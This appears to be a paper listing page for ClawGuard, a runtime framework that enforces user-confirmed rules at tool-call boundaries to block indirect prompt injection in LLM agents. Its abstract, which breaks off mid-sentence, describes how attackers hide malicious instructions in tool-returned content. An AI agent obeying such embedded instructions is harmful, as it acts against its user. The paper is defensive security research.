ClawGuard: A Runtime Security Framework for Tool-Augmented LLM Agents Against Indirect Prompt Injection

Wei Zhao; Zhe Li; Peixin Zhang; Jun Sun

arXiv:2604.11790·cs.CR·May 12, 2026

ClawGuard: A Runtime Security Framework for Tool-Augmented LLM Agents Against Indirect Prompt Injection

Wei Zhao, Zhe Li, Peixin Zhang, Jun Sun

PDF

1 Repo

TL;DR

ClawGuard introduces a runtime security framework that enforces user-confirmed rules at tool-call boundaries, effectively preventing indirect prompt injection in tool-augmented LLM agents without modifying models.

Contribution

It presents a deterministic, auditable defense mechanism that derives task-specific constraints to block injection pathways, enhancing security without infrastructure changes.

Findings

01

Achieves robust protection against indirect prompt injection across multiple models and benchmarks.

02

Maintains agent utility and incurs minimal token overhead.

03

Demonstrates effectiveness without model modification or infrastructure change.

Abstract

Tool-augmented Large Language Model (LLM) agents have demonstrated impressive capabilities in automating complex, multi-step real-world tasks, yet remain vulnerable to indirect prompt injection. Adversaries exploit this weakness by embedding malicious instructions within tool-returned content, which agents directly incorporate into their conversation history as trusted observations. To address these vulnerabilities, we introduce \textsc{ClawGuard}, a novel runtime security framework that enforces a user-confirmed rule set at every tool-call boundary, transforming unreliable alignment-dependent defense into a deterministic, auditable mechanism that intercepts adversarial tool calls before any real-world effect is produced. By automatically deriving task-specific access constraints from the user's stated objective prior to any external tool invocation, \textsc{ClawGuard} blocks all three…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Code & Models

Repositories

Claw-Guard/ClawGuard
github

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.